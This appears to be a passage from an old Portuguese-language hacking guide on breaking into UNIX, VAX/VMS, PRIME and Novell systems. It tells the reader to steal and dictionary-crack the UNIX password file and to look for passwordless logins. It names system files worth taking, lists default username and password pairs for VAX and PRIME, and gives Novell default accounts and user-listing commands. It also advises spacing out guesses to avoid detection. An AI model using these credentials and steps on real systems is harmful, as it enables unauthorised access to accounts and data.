Esse arquivo muito provávelmente estará encriptado. O password estará escondido e, sem um programa para decriptá-la, a lista será inútil. O programa de decriptação do password UNIX, trabalha em cima de um .dicionário pré moldado, comparando as palavras com o texto encriptado. É bom lembrar que o Brute Force não irá decriptar a lista. Ele irá tentar comparar palavras encriptadas por uma lista de nomes com a lista de passwords. Quando ele encontrar semelhanças (ex. duas palavras iguais com a mesma decriptação) ele para e dá a lista pronta. Brute Force (14,4k) Dictionary Maker (7,73k)
Antes de usar o programa decriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema.
Ex.: fou::6789:10: Ricardo Gomes:/home/dir/fou:/bin/fou
Depois da lista de passwords, pegue
os seguintes arquivos: /etc/group - É a lista de newsgroups e seus passwords também
encriptados. sintaxe - groupname:password:group id:users in group /etc/hosts - É a lista
de hosts conectados ao sistemas. Útil quando a conexão é via telenet ou rlogin.
/usr/mail/ - É onde estão guardadas as mensagens de cada usuário.
Sistema VAX/VMS
Para entrar no sistema VAX/VMS, você
deve proceder da mesma maneira que fez no UNIX: Arrume a lista de passwords, entre com o
login de alguém ou tente os defaults
Username: ..Password:
system .....operator
system .....manager
system .....system
system .....syslib
operator ...operator
systets ....uetp
systest ....systest
systest ....test
sysmaint ...sysmaint
sysmaint ...service
sysmaint ...digital
field ......field
field ......service
guest ......guest
guest ......sem password
demo .......demo
demo .......sem password
test .......test
decnet .....decnet
Dentro do sistema não há muito o
que fazer. Você pode tentar pegar a lista de passwords em:
SYS$SYSTEM:SYSUAF.DAT, mas normalmente, ela não
está disponível para os usuários Tome muito cuidado quando tentar quebrar o sistema
VAX's, pois ele guarda todos os bad logins e bad passwords, podendo rastreá-lo na sua
próxima tentativa. Se você quiser mesmo tentar, entre com alguns passwords em um dia,
espere e tente novamente no dia seguinte...
Sistema PRIME
Ao entrar no sistema PRIME você
deverá fazer as mesmas coisas que fez no UNIX e no VAX's.
Username: ..Password:
prime ......prime
primos .....primos
primos .....prime
primos_cs ..prime
primos_cs ..primos
primenet ...primenet
system .....system
system .....prime
system .....primos
netlink ....netlink
test .......test
guest ......guest
guest1 .....guest
Rede Novell
1. Entrando no Sistema - Para quebrar a rede
Novell você deve utilizar os mesmos recursos que usou para entrar nos sistemas UNIX ou
VAX's. Na Novell você também pode tentar alguns defaults. Os defaults da rede Novell
são usados para a conexão com portas externas como impressoras, fax e etc..., todos sem
password. Abaixo estão alguns defaults:
Login:
superior
guest
admin
user_template
print
laser
hp_laser
printer
laserwriter
post
mail
gateway
gate
router
backup
wangtek
fax
faxuser
faxworks
test
archivist
chey_archsvr
windows_passthru
Se você conseguir entrar com esses
defaults, você pode conseguir a lista com os logins verdadeiros fazendo o seguinte: vá
ao diretório SYS:PUBLIC, digite SYSCON e dê enter. Então vá a User Information e veja
a lista com todos os logins desse servidor. Esses logins só poderão ser utilizados se
estiverem sem password, pois a lista só mostra os nomes. Nunca tente chutar o password de
um usuário, pois o computador armazena o numero de vezes que uma senha foi digitada
errada e manda para o usuário verdadeiro quando ele se conecta. Esse sistema de
segurança se chama Intruder Detection. Se você não conseguir entrar com esses logins,
faça o seguinte: no prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e escreva CX
/T /A /R. Com isso você, provavelmente conseguirá a lista dos usuários.